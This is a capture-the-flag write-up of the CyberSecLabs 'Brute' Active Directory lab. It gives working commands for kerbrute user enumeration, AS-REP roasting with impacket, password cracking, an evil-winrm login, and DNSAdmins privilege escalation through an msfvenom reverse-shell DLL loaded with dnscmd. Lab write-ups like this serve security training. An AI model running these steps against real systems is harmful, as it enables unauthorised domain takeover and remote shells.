CyberSecLabs - Brute

⇒ Brute was an medium active directory machine created by “wtfitsaduck” that taught us :

  • How to enumerate AD users by kerbruting with a wordlist to identify valid users
  • Checking if DONT_REQ_PREAUTH set for the users then kerberoasting.
  • Privilege Escalation from DNS Admins Group to Domain Admin.

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Brute%20Machine%20f3603f7c60b94b5ca13fa3131ba6052f/Untitled.png

NMAP

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Brute%20Machine%20f3603f7c60b94b5ca13fa3131ba6052f/Untitled%201.png


Enumerating and Kerberoasting

⇒ So we enumerated smb and performed ldapqueries but came up empty handed. So next we decided to run kerbrute with username wordlist (from seclists ) to identify valid users which could have DONT_REQ_PREAUTH set which will allow us to perform kerberoasting using GetNPUsers ( impacket tool )

./kerbrute_linux_amd64 userenum -d brute.csl –dc 172.31.3.3 names.txt

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Brute%20Machine%20f3603f7c60b94b5ca13fa3131ba6052f/Untitled%202.png

  • Next we will kerberoast accounts that have DONT_REQ_PREAUTH set using impacket tool GetNPUsers and retrieve ASREP which we will crack using john.

python3 GetNPUsers.py -dc-ip 172.31.3.3 brute.csl/ -usersfile users.txt -format hashcat -outputfile test11.txt

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Brute%20Machine%20f3603f7c60b94b5ca13fa3131ba6052f/Untitled%203.png

  • Cracking it using john

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Brute%20Machine%20f3603f7c60b94b5ca13fa3131ba6052f/Untitled%204.png

tess : Unique1

⇒ So now we have credentials for user tess. We can connect to the machine as user tess using evil-winrm

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Brute%20Machine%20f3603f7c60b94b5ca13fa3131ba6052f/Untitled%205.png


Privilege Escalation to Root [ Exploiting DNSAdmins Group ]

⇒ We discover that the user tess is a part of DNSAdmins group. We can leverage this to escalate our privileges to the domain admin. This is an fantastic blog on how to exploit it : https://www.abhizer.com/windows-privilege-escalation-dnsadmin-to-domaincontroller/

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Brute%20Machine%20f3603f7c60b94b5ca13fa3131ba6052f/Untitled%206.png

  • First we’ll generate the dll payload using msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.0.80 LPORT=7777 –platform=windows -f dll > enox.dll

  • Next we will be importing the plugin to the server

dnscmd.exe /config /serverlevelplugindll C:\Users\Tess\Documents\enox.dll

  • Now we just have to restart the dns service

    sc.exe stop dns

    sc.exe start dns

⇒ Then we get an reverse shell as system after the service is restarted and our plugin is executed :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Brute%20Machine%20f3603f7c60b94b5ca13fa3131ba6052f/Untitled%207.png